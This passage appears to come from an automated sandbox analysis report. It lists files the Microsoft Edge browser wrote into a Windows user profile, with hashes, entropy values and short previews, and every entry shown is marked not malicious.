                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):305
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1484154823782005
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7inD1wkn23oH+TcwtnG2tbB2KLlpivyq2Pwkn23oH+TcwtnG2tMsIFUv:7OyfYebn9VFLTNvYfYebn9GFUv
                                                                                                                                                                                                                                                                                  MD5:9209A9277ADE2EE609B28BC6D21CD9DC
                                                                                                                                                                                                                                                                                  SHA1:D40D30F6E8480B06B5BC9D910E4192DE80DEFAB2
                                                                                                                                                                                                                                                                                  SHA-256:6F657E3A13CCA005F656AC7AD4D73462D0276E732DE8137D37DAE49B83848DC2
                                                                                                                                                                                                                                                                                  SHA-512:A303734D47624738908538D049FC4C6A6CEF476A363318B754A02B4D46ECCCEA51842A4C60E79D333A25F88816403C38BD35B0D8830312859FD1C5FDA57F0753
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.618 1ea0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/10-12:41:28.634 1ea0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.494709561094235
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                                                                                                                  MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                                                                                                                  SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                                                                                                                  SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                                                                                                                  SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.613867825747277
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLW4QpRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWvdRvIMAqi:TLqpR+DDNzWjJ0npnyXKUO8+jJp8mL
                                                                                                                                                                                                                                                                                  MD5:3F7CED6BB75AE9F9A9D04392674B853F
                                                                                                                                                                                                                                                                                  SHA1:8E196F4708F5252D9AB6BB35618A1D7871EFEA9B
                                                                                                                                                                                                                                                                                  SHA-256:8ACD25B9474A7BBD9DE6D6A5BD42500C491275E7735A358DADC5D649F8FDA576
                                                                                                                                                                                                                                                                                  SHA-512:FEC48E738ACF9CF91BA7DC6F7AAB7FA6F9C4E30128417738654136D23B78BBB9EFBC62D28C634660ECF5903FF960895379C4924EEC65DE8EE9F83AA61E55F1C3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3541728095281025
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:1A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:1FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                  MD5:4482203CE171647CB44D06F7405A77C1
                                                                                                                                                                                                                                                                                  SHA1:E799EA33D605EBAD34FF970237B47A5E44C02AA2
                                                                                                                                                                                                                                                                                  SHA-256:699198BD3617CD01FE45BA428221278847A6433251E431613DEA6B5B22855714
                                                                                                                                                                                                                                                                                  SHA-512:5F9261E6E84ECE6DB81759D7A912F94ABA54A47ACB60D9BF47B633121F2FD3FA621E0C737AE81BEEC55F4B879C517434ACD28AF0AC12A7E6E74F883406CF1382
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378326097668235..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.157109102793645
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7lD1wkn23oH+Tcwtk2WwnvB2KLlpI434q2Pwkn23oH+Tcwtk2WwnvIFUv:7UfYebkxwnvFLTivYfYebkxwnQFUv
                                                                                                                                                                                                                                                                                  MD5:40B7F4B028494C6861557F878042E71C
                                                                                                                                                                                                                                                                                  SHA1:834F46D03B31EFE45F75782B6198031B4F8276A6
                                                                                                                                                                                                                                                                                  SHA-256:591DF0D3D4352D5CF5DA1A0A9F67928C73470E4B1A1CD4F6B2FE30B74DF41BE1
                                                                                                                                                                                                                                                                                  SHA-512:CF29BBD953ECFF3CF95B2C00D03BA61A7D0FFA10567B0BF023A9847A1D754B78F0B51574D0CD1130ED12413FB3CD001B79049DA2A9FA6F2F5B32C20AA4B48240
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:35.483 2110 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/10-12:41:35.771 2110 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324615384555102
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rr:C1gAg1zfvT
                                                                                                                                                                                                                                                                                  MD5:C77BC910D6D495711C531B2DE49642BC
                                                                                                                                                                                                                                                                                  SHA1:160E559FEA8C98A22DE3C0EA3FDC5460EC93DED5
                                                                                                                                                                                                                                                                                  SHA-256:EFD469E51E3C1A0C208F2B617C022B3CB752DE97468455B9DC92F55BE1457C48
                                                                                                                                                                                                                                                                                  SHA-512:C3ECA51CF89716E4591F76593653A98FC30EC4042CCCFD1C16F8FF73AD859F473AA50C8589150A6ADD47F6A1561D9F9C669E91B94E04538AA151DCF54DDC4F29
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147726950681785
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7i3aRRM1wkn23oH+Tcwt8aVdg2KLlpisq2Pwkn23oH+Tcwt8aPrqIFUv:7OSrfYeb0LT3vYfYebL3FUv
                                                                                                                                                                                                                                                                                  MD5:9EFF0F6634C27C7D30668E1BD0D0FEA4
                                                                                                                                                                                                                                                                                  SHA1:8281E73CA0469575E7A3D1F547FC81B31A837667
                                                                                                                                                                                                                                                                                  SHA-256:78292A6D7411D963BFD41578C5A85E0CB16F77AD1CC3DD4DF15DD773009E18DC
                                                                                                                                                                                                                                                                                  SHA-512:89610083DEB0C40B1A097D77908320263B883D6D92A7FD71AAFE5767D5ED40FB9F399950A3B98EF62C0700D7A3D89E9A0E6331C796AFE868ADABB8692FE77CDD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.656 1e74 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2024/12/10-12:41:28.807 1e74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                  Malicious:false
